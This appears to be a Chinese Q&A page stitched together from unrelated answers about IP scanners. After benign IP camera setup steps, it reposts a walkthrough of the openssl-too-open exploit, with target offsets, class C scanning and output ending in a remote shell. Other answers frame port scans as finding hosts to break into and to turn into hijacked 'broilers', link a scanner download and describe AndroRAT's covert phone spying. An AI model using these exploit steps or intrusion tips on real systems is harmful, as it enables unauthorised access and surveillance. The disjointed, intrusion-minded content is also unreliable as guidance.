*** 摄像头IP扫描工具有哪些？

一般摄像机包装上面会有相关软件二维码，扫描即可对其进行配置，第二个 *** 就是用专门的设置软件设置，这个厂家是不会给你的，而且二维码的APP有的还不一定能设置。

摄像头的IP地址怎么获取

有获取它的软件吗？

1、按照说明书或者快速安装指南安装，其中和 *** 摄像机一起出厂的光盘里就有IPCamSearch工具，根据搜索工具对 *** 摄像机分配IP地址和端口；

2、将配套光盘放入计算机光驱中，运行其中的IPCamSearch工具，将会出现一个界面；

3、界面中显示出当前局域网中搜索到的所有的IP

Camera的产品序列号，当前的IP地址以及固件版本；

4、如果IP

Camera和所用电脑不在同一个网段，是不能通过互相访问的。比如：电脑的IP是192.168.100.33，子网掩码是255.255.255.0，那么电脑可以访问到的IP地址段是192.168.100.1~192.168.100.255，如果IP

Camera的IP地址不在这个范围，就不能被电脑直接访问了；

5、这时可以点击“设定IP地址”，对选定的IP

Camera进行设置；

6、不同的摄像机的ip设置软件不会相同，完成后设置后，就可以观看；

7、如果要实现远程观看，还需要做个端口映射的设置，将上面设置的信息输入到“虚拟服务器页面”，设置成功后就可以远程观看了。

求可以扫描ip主机漏洞的软件，附带漏洞利用的更好，win7的

apache_openssl漏洞的利用及权限的提升

apache_openssl漏洞的利用及权限的提升

－－nightcat

转载请保持文章完整

之一部分：获得shell.

在packetstorm玩了一段时间，遇到有openssl-too-open.tar.gz这个exploit.

现在看看软件包的描述：

OpenSSL v0.9.6d and below remote exploit for Apache/mod_ssl servers which takes advantage of the KEY_ARG overflow. Tested against most major Linux distributions. Gives a remote nobody shell on Apache and remote root on other servers. Includes an OpenSSL vulnerability scanner which is more reliable than the RUS-CERT scanner and a detailed vulnerability *** ysis

这个描述说明这个exploit 是openssl v 0.9.6的key_arg的漏洞来达到溢出的目的。不过也要

注意apache/mod_ssl的版本信息。对于大多数的有这样条件的都能溢出成功。取得一个id是

nobody shell,有些甚至是root的权限。软件包里面有一个扫描器,exploit。

好象听起来很诱人，down回来研究一下。

nightcat@nightcat$tar -zxvf openssl-too-open.tar.gz

nightcat@nightcat$cd openssl-too-open

Makefile README linux-x86.c main.c main.h scanner.c ssl2.c ssl2.h

习惯性的要读一下软件包的REAMDE文件。

nightcat@nightcat$ more README

得到一些有用的信息：

1.编译的 *** ：

直接make就可以，之后就可以得到openssl-too-open和openssl-scanner

2.openssl-too-open的用法：

Usage: ./openssl-too-open [options] host

-a arch target architecture (default is 0x00)

-p port SSL port (default is 443)

-c N open N apache connections before sending the shellcode (default is 30)

-m N maximum number of open connections (default is 50)

-v verbose mode

Supported architectures:

0x00 - Gentoo (apache-1.3.24-r2)

0x01 - Debian Woody GNU/Linux 3.0 (apache-1.3.26-1)

0x02 - Slackware 7.0 (apache-1.3.26)

0x03 - Slackware 8.1-stable (apache-1.3.26)

0x04 - RedHat Linux 6.0 (apache-1.3.6-7)

0x05 - RedHat Linux 6.1 (apache-1.3.9-4)

0x06 - RedHat Linux 6.2 (apache-1.3.12-2)

0x07 - RedHat Linux 7.0 (apache-1.3.12-25)

0x08 - RedHat Linux 7.1 (apache-1.3.19-5)

0x09 - RedHat Linux 7.2 (apache-1.3.20-16)

0x0a - Redhat Linux 7.2 (apache-1.3.26 w/PHP)

0x0b - RedHat Linux 7.3 (apache-1.3.23-11)

0x0c - SuSE Linux 7.0 (apache-1.3.12)

0x0d - SuSE Linux 7.1 (apache-1.3.17)

0x0e - SuSE Linux 7.2 (apache-1.3.19)

0x0f - SuSE Linux 7.3 (apache-1.3.20)

0x10 - SuSE Linux 8.0 (apache-1.3.23-137)

0x11 - SuSE Linux 8.0 (apache-1.3.23)

0x12 - Mandrake Linux 7.1 (apache-1.3.14-2)

0x13 - Mandrake Linux 8.0 (apache-1.3.19-3)

0x14 - Mandrake Linux 8.1 (apache-1.3.20-3)

0x15 - Mandrake Linux 8.2 (apache-1.3.23-4)

/****想成功，就要看准系统类型　和apache版本号

*****如果是 0x07 - RedHat Linux 7.0 (apache-1.3.12-25)：

*****./epenssl-too-open -a 0x07 ip .就应该可以啦！

3.openssl-scanner的用法：

Usage: ./openssl-scanner [options] host

-i inputfile file with target hosts

-o outputfile output log

-a append to output log (requires -o)

-b check for big endian servers

-C scan the entire class C network the host belogs to

-d debug mode

-w N connection timeout in seconds

Examples: ./openssl-scanner -d 192.168.0.1

./openssl-scanner -i hosts -o my.log -w 5

./openssl-scanner -C 192.168.0.0

/****扫描一个c类的ip

*****./openssl-scanner -C 192.168.0.0

4.一个实现例子：

$ ./openssl-scanner -C 192.168.0.0

: openssl-scanner : OpenSSL vulnerability scanner

by Solar Eclipse solareclipse@phreedom.org

Opening 255 connections . . . . . . . . . . done

Waiting for all connections to finish . . . . . . . . . . . done

192.168.0.136: Vulnerable

$ nc 192.168.0.1 80

HEAD / HTTP/1.0

HTTP/1.1 200 OK

Date: Tue, 17 Sep 2002 17:47:44 GMT

Server: Apache-AdvancedExtranetServer/1.3.20 (Mandrake Linux/3mdk) mod_ssl/2.8.4 OpenSSL/0.9.6b

Connection: close

Content-Type: text/html

./openssl-too-open -a 0x14 192.168.0.1

: openssl-too-open : OpenSSL remote exploit

by Solar Eclipse solareclipse@phreedom.org

: Opening 30 connections

Establishing SSL connections

: Using the OpenSSL info leak to retrieve the addresses

ssl0 : 0x810b3a0

ssl1 : 0x810b360

ssl2 : 0x810b4e0

* Addresses don't match.

: Opening 40 connections

Establishing SSL connections

: Using the OpenSSL info leak to retrieve the addresses

ssl0 : 0x8103830

ssl1 : 0x80fd668

ssl2 : 0x80fd668

* Addresses don't match.

: Opening 50 connections

Establishing SSL connections

: Using the OpenSSL info leak to retrieve the addresses

ssl0 : 0x8103830

ssl1 : 0x8103830

ssl2 : 0x8103830

: Sending shellcode

ciphers: 0x8103830 start_addr: 0x8103770 SHELLCODE_OFS: 184

Reading tag

Execution of stage1 shellcode succeeded, sending stage2

Spawning shell...

bash: no job control in this shell

bash-2.05$

bash-2.05$ uname -a; id; w;

Linux localhost.localdomain 2.4.8-26mdk #1 Sun Sep 23 17:06:39 CEST 2001 i686 unknown

uid=48(apache) gid=48(apache) groups=48(apache)

1:49pm up 4:26, 1 user, load average: 0.04, 0.07, 0.07

USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT

bash-2.05$

整个README 文件已经说的很明白了：

现在是总结一下实现的过程：

1.通过openssl-scanner来扫描一个c段的ip，找到有漏洞的主机，

2.用nc的 *** 查找banner得到三个目标内容：apache的版本号，openssl的版本号，操作系统版本3.在通过openssl-too-open来进行溢出得到一个shell.

IP扫描工具和端口扫描工具都有什么用

IP扫描主要是在网上找你要入侵的目标，找到目标后我们就要用端口扫描工具去扫目标电脑打开了那些端口，比如对方开了3389端口的话，嘿嘿，不说你也知道怎么做了吧

现在更好用的扫描IP黑客工具是什么？

下载地址:http://www.hackol.com/downsoft/06/s.rar

扫描器是一款命令行下高速扫描利器，通过最新的瑞星杀毒软件测试

命令: s.exe syn ip1 ip2 端口号 /save

s.exe tcp ip1 ip2 端口号 线程数 /save

s.exe不可以在xp sp2下使用!那谁有xp sp2专版的!当然的使用syn代替TCP可以是可以但太慢了

s.exe扫描器的使用说明

首先我解释下什么是S扫描器，S扫描器是针对微软ms04045漏洞出的一个扫描，原来作者出这东西

的目的是为了扫描这个漏洞，但现在已经变成我们黑客手中的兵器了，大家也许看过很多如何找肉鸡的

动画或刷QB的动画，那些动画里面很多都是用S扫描器来扫描肉鸡或别人电脑所开放的端口及一些漏洞，

都用这工具的好处是它的扫描速度实在是一个字---强！ 今天我就来教下大家如何使用S扫描器。

大家有没有好的扫描工具 扫IP的那种的可以入侵他的计算机

s-GUI版扫描器（图形界面版S扫描器）配上纯真IP数据库要扫哪扫哪

扫IP段开放的某个或几个端口很好用

扫特定IP用superscan中文版吧

HACK黑客常用哪些工具

AndroRAT

AndroRAT一词源自Android与RAT（即远程管理工具）。这款顶级黑客工具已经拥有相当长的发展历史，而且最初其实是一款客户端/服务器应用。这款应用旨在帮助用户以远程方式控制Android系统，同时从其中提取信息。这款Android应用会在系统启动完成后以服务形式开始运行。因此，如果用户并不需要与该服务进行交互。此应用还允许大家通过呼叫或者短信等方式触发服务器连接。

这款极具实用性的Android黑客应用之功能包括收集联系人、通话记录、消息以及所在位置等信息。此应用还允许大家以远程方式对接收到的消息以及手机运行状态加以监控，进行手机呼叫与短信发送，通过摄像头拍摄照片以及在默认浏览器当中打开URL等等。

Hackode

Hackode是一款Android应用，其基本上属于一整套工具组合，主要面向高阶黑客、IT专家以及渗透测试人员。在这款应用当中，我们可以找到三款模块——Reconnaissance、Scanning以及Security Feed。

通过这款应用，大家可以实现谷歌攻击、SQL注入、MySQL Server、Whois、Scanning、DNS查找、IP、MX记录、DNS Dif、Security RSS Feed以及漏洞利用等功能。这是一款出色的Android黑客应用，非常适合入门者作为起步工具且无需提供任何个人隐私信息。

zANTI

zANTI是一款来自Zimperium的知名Android黑客套件。此软件套件当中包含多种工具，且广泛适用于各类渗透测试场景。这套移动渗透测试工具包允许安全研究人员轻松对 *** 环境加以扫描。此工具包还允许IT管理员模拟出一套先进黑客环境，并以此为基础检测多项恶意技术方案。

大家可以将zANTI视为一款能够将Backtrack强大力量引入自己Android设备的应用。只要登录至zANTI，它就会映射整套 *** 并嗅探其中的cookie以掌握此前曾经访问过的各个网站——这要归功于设备当中的ARP缓存。

应用当中的多种模块包括 *** 映射、端口发现、嗅探、数据包篡改、DoS以及MITM等等。